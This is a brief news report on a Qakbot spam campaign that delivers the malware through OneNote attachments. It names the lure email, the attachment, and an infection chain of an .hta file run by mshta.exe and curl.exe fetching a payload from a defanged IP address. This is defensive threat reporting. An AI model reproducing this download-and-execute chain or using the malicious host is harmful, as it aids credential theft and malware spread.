Cyble Research Intelligence Labs (CRIL) detected a spam campaign that used the Qakbot malware, deployed via a OneNote attachment that the users were nudged to download. The Qakbot malware is capable of stealing usernames, passwords, and cookies from browsers.
The campaign involving Qakbot malware in OneNote begins by sending a malicious email dropping an embedded .hta file that is executed by mstha.exe. The subject on the email sample read “OFERTA PO# 000938883 NSS”, and the OneNote file was named “ApplicationReject_68390(Jan31).one.”
“Kindly check the attached document,” read the email, followed by a grammatically incorrect sentence, “It would be curious for you.”
The Qakbot malware in OneNote can also steal emails from the systems and spread itself to devices within the network. It can deploy ransomware as planned by the threat actor.
Technical details of the Qakbot malware in OneNote
The OneNote attachment appears to be from the cloud, which after double clicking as directed in the email, triggers the Qakbot attack. First, it drops a .hta file named ‘attachment.hta’ that executes itself using mshta.exe.
Sample of the .hta file (Image: Cyble)
The anonymous function can also be called by sending the URL ‘http://77[.]75[.]230[.]128/19825%5B.%5Ddat’ in the form of an argument. The anonymous function starts a wscript.shell object to execute curl.exe. Thereafter, 19825.dat file gets downloaded from the remote server, which is saved as 121.png in %Programdata%
CRIL researchers shared with The Cyber Express that since Qakbot is an evolving malware, and users must not open links from Torrents or Warez that could potentially be malware.